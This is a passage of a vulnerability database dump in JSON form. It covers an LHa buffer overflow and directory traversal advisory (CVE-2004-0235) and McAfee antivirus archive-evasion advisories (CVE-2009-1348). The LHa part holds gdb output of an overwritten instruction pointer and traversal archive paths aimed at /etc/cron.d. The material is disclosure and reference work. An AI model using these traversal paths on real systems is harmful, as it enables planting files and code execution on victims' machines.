y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0235"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "PACKETSTORM",
"id": "33241"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0235",
"trust": 2.9
},
{
"db": "BID",
"id": "10243",
"trust": 2.8
},
{
"db": "XF",
"id": "16013",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:978",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:10409",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FEDORA-2004-119",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FLSA:1833",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-515",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200405-02",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:178",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:179",
"trust": 0.6
},
{
"db": "CONECTIVA",
"id": "CLA-2004:840",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-8665",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33241",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"id": "VAR-200408-0141",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T12:39:28.431000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LHA for UNIX Version 1.17",
"trust": 0.8,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://lha.sourceforge.jp/"
},
{
"title": "RHSA-2004:178",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2004-178.html"
},
{
"title": "RHSA-2004:179",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2004-179.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10243"
},
{
"trust": 2.0,
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
},
{
"trust": 1.8,
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"trust": 1.7,
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
},
{
"trust": 1.6,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16013"
},
{
"trust": 1.4,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:978"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10409"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a978"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0235"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0235"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:10409"
},
{
"trust": 0.4,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"trust": 0.3,
"url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
},
{
"trust": 0.3,
"url": "http://www.stalker.com/cgpmcafee/"
},
{
"trust": 0.3,
"url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
},
{
"trust": 0.3,
"url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
},
{
"trust": 0.3,
"url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
},
{
"trust": 0.3,
"url": "http://www.rarsoft.com/"
},
{
"trust": 0.3,
"url": "http://www.winzip.com/"
},
{
"trust": 0.3,
"url": "/archive/1/366265"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
},
{
"trust": 0.1,
"url": "http://shellcode.org/audit/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
},
{
"trust": 0.1,
"url": "http://idiosynkratisk.tk/"
},
{
"trust": 0.1,
"url": "http://www.advogato.org/person/metaur/"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-8665"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-08-18T00:00:00",
"db": "VULHUB",
"id": "VHN-8665"
},
{
"date": "2004-04-30T00:00:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"date": "2004-05-04T04:25:06",
"db": "PACKETSTORM",
"id": "33241"
},
{
"date": "2004-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"date": "2004-08-18T04:00:00",
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8665"
},
{
"date": "2009-07-12T04:07:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000170"
},
{
"date": "2006-09-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-176"
},
{
"date": "2017-10-11T01:29:24.810000",
"db": "NVD",
"id": "CVE-2004-0235"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Lha Directory Traversal Vulnerability in Testing and Extracting Process",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000170"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-176"
}
],
"trust": 0.9
}
}
var-200904-0511
Vulnerability from variot
The AV engine before DAT 5600 in McAfee VirusScan, Total Protection, Internet Security, SecurityShield for Microsoft ISA Server, Security for Microsoft Sharepoint, Security for Email Servers, Email Gateway, and Active Virus Defense allows remote attackers to bypass virus detection via (1) an invalid Headflags field in a malformed RAR archive, (2) an invalid Packsize field in a malformed RAR archive, or (3) an invalid Filelength field in a malformed ZIP archive. Multiple McAfee products are prone to a vulnerability that may allow certain compressed archives to bypass the scan engine. Successful exploits will allow attackers to distribute files containing malicious code that the antivirus application will fail to detect. The issue affects all McAfee software that uses DAT files. ----------------------------------------------------------------------
Secunia is pleased to announce the release of the annual Secunia report for 2008.
Highlights from the 2008 report: * Vulnerability Research * Software Inspection Results * Secunia Research Highlights * Secunia Advisory Statistics
Request the full 2008 Report here: http://secunia.com/advisories/try_vi/request_2008_report/
Stay Secure,
Secunia
TITLE: McAfee Products Archive Handling Security Bypass
SECUNIA ADVISORY ID: SA34949
VERIFY ADVISORY: http://secunia.com/advisories/34949/
DESCRIPTION: Some weaknesses have been reported in various McAfee products, which can be exploited by malware to bypass the scanning functionality.
The weaknesses are caused due to errors in the handling of archive file formats (e.g.
SOLUTION: Update .DAT files to DAT 5600 or later. http://www.mcafee.com/apps/downloads/security_updates/dat.asp
PROVIDED AND/OR DISCOVERED BY: * Thierry Zoller * The vendor also credits Mickael Roger.
ORIGINAL ADVISORY: McAfee: https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT
Thierry Zoller: http://blog.zoller.lu/2009/04/mcafee-multiple-bypassesevasions-ziprar.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. ____________
From the low-hanging-fruit-department - Mcafee multiple generic evasions
Release mode: Coordinated but limited disclosure. Ref : TZO-182009 - Mcafee multiple generic evasions WWW : http://blog.zoller.lu/2009/04/mcafee-multiple-bypassesevasions-ziprar.html Vendor : http://www.mcafee.com Status : Patched CVE : CVE-2009-1348 (provided by mcafee) https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT
Security notification reaction rating : very good Notification to patch window : +-27 days (Eastern holidays in between)
Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
Affected products : - McAfee VirusScan\xae Plus 2009 - McAfee Total Protection\x99 2009 - McAfee Internet Security - McAfee VirusScan USB - McAfee VirusScan Enterprise - McAfee VirusScan Enterprise Linux - McAfee VirusScan Enterprise for SAP - McAfee VirusScan Enterprise for Storage - McAfee VirusScan Commandline - Mcafee SecurityShield for Microsoft ISA Server - Mcafee Security for Microsoft Sharepoint - Mcafee Security for Email Servers - McAfee Email Gateyway - McAfee Total Protection for Endpoint - McAfee Active Virus Defense - McAfee Active VirusScan
It is unkown whether SaaS were affected (tough likely) : - McAfee Email Security Service - McAfee Total Protection Service Advanced
I. Background ~~~~~~~~~~~~~ Quote: "McAfee proactively secures systems and networks from known and as yet undiscovered threats worldwide. Home users, businesses, service providers, government agencies, and our partners all trust our unmatched security expertise and have confidence in our comprehensive and proven solutions to effectively block attacks and prevent disruptions."
II. Description ~~~~~~~~~~~~~~~ The parsing engine can be bypassed by a specially crafted and formated RAR (Headflags and Packsize),ZIP (Filelenght) archive.
III. Impact ~~~~~~~~~~~ A general description of the impact and nature of AV Bypasses/evasions can be read at : http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html
The bug results in denying the engine the possibility to inspect code within RAR and ZIP archives. There is no inspection of the content at all and hence the impossibility to detect malicious code.
IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD/MM/YYYY 04/04/2009 : Send proof of concept RAR I, description the terms under which I cooperate and the planned disclosure date
06/04/2009 : Send proof of concept RAR II, description the terms under which I cooperate and the planned disclosure date
06/04/2009 : Mcafee acknowledges receipt and reproduction of RAR I, ack acknowledges receipt of RARII
10/04/2009 : Send proof of concept ZIP I, description the terms under which I cooperate and the planned disclosure date
21/04/2009 : Mcafee provides CVE number CVE-2009-1348
28/04/2009 : Mcafee informs me that the patch might be released on the 29th 29/04/2009 : Mcafee confirms patch release and provides URL https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT
29/04/2009 : Ask for affected versions
29/04/2009 : Mcafee replies " This issue does affect all vs engine products, including both gateway and endpoint"
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/. Description ~~~~~~~~~~~~~~~ Improper parsing of the PDF structure leads to evasion of detection of malicious PDF documents at scantime and runtime.
This has been tested with several malicious PDF files and represents a generic evasion of all PDF signatures and heuristics.
General information about evasion/bypasses can be found at : http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html
III. Impact ~~~~~~~~~~~ Known PDF exploits/malware may evade signature detection, 0day exploits may evade heuristics. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD.MM.YYYY 01.06.2009 - Reported 20.10.2009 - McAfee informed us that they published the advisory on their website < waiting for others vendors to patch > 27.10.2009 - G-SEC releases this advisory
About G-SEC ~~~~~~~~~~~ G-SEC\x99 is a vendor independent luxemburgish led IT security consulting group. More information available at : http://www.g-sec.lu/
Full-Disclosure - We believe in it. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200904-0511",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "securityshield for microsoft isa server",
"scope": null,
"trust": 1.7,
"vendor": "mcafee",
"version": null
},
{
"model": "active virusscan",
"scope": null,
"trust": 1.7,
"vendor": "mcafee",
"version": null
},
{
"model": "active virus defense",
"scope": null,
"trust": 1.7,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise",
"scope": "eq",
"trust": 1.6,
"vendor": "mcafee",
"version": null
},
{
"model": "email gateway",
"scope": null,
"trust": 1.4,
"vendor": "mcafee",
"version": null
},
{
"model": "total protection for endpoint",
"scope": null,
"trust": 1.4,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan plus",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2009"
},
{
"model": "total protection",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2009"
},
{
"model": "virusscan command line",
"scope": null,
"trust": 1.1,
"vendor": "mcafee",
"version": null
},
{
"model": "total protection for endpoint",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "virusscan enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "virusscan commandline",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "active virus defense",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "securityshield for microsoft sharepoint",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "virusscan usb",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "active virusscan",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2009"
},
{
"model": "securityshield for email servers",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "securityshield for microsoft isa server",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "email gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "*"
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "security for email servers",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "security for microsoft sharepoint",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan plus",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan usb",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "total protection",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "mcafee",
"version": "0"
},
{
"model": "securityshield for email servers",
"scope": null,
"trust": 0.6,
"vendor": "mcafee",
"version": null
},
{
"model": "securityshield for microsoft sharepoint",
"scope": null,
"trust": 0.6,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan commandline",
"scope": null,
"trust": 0.6,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan plus",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "20070"
},
{
"model": "virusscan enterprise i patch",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.015"
},
{
"model": "virusscan enterprise i patch",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.012"
},
{
"model": "virusscan enterprise i patch",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.011"
},
{
"model": "virusscan enterprise i",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "virex",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.7"
},
{
"model": "virex",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "total protection",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "20070"
},
{
"model": "portalshield for microsoft sharepoint",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "netshield for netware",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4"
},
{
"model": "netshield for netware",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "linuxshield",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "1"
},
{
"model": "linuxshield",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for lotus domino on windows",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5"
},
{
"model": "groupshield for lotus domino on aix",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5"
},
{
"model": "groupshield for lotus domino",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7"
},
{
"model": "groupshield for lotus domino",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.55.0.964.1"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.55.0.902.1"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.55.0.1007.1"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "20005"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.5"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0.616.102"
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4"
},
{
"model": "virusscan usb",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "virusscan professional",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "virusscan enterprise for storage",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "virusscan enterprise for sap",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "total protection for endpoint",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "total protection",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "security for microsoft sharepoint",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "security for email servers",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "email gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
